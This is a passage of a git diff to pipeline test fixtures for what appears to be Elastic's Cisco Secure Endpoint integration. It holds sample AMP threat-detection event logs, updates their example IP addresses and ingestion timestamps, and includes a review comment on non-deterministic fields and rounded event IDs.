Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index 906c5f988fb..2faff34a516 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -24,7 +24,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -34,8 +34,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174499815Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337040100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -57,7 +57,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -104,7 +104,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
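Review bot: The `+ "ingested": "2021-12-09T13:35:36.337040100Z"` line in this hunk (and its twin in @@ -118,8) changes only because the fixture was regenerated, so `event.ingested` is a non-deterministic value living in a file that is compared byte-for-byte unless the data stream's pipeline test config (not visible here) lists it under `dynamic_fields: event.ingested: ".*"`; worth confirming that entry exists, otherwise every regeneration churns this file and a stale timestamp fails the next run. On the same `+ "original":` line, the captured sample carries `\"id\":6159251512150196000` beside `\"detection_id\":\"6159251512150196256\"`, i.e. the numeric `data.id` was already rounded (presumably by a serializer limited to 53-bit integers) before the sample was recorded. Any ECS field the pipeline derives from `data.id` therefore cannot be checked for exact preservation by this fixture, whereas the string-typed `detection_id` can; if exact-id coverage matters, a sample whose `id` and `detection_id` agree would be needed.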
@@ -118,8 +118,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174504805Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337047700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -141,7 +141,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -188,7 +188,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -202,8 +202,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174507048Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337053100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -225,7 +225,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -272,7 +272,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -286,8 +286,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174509121Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 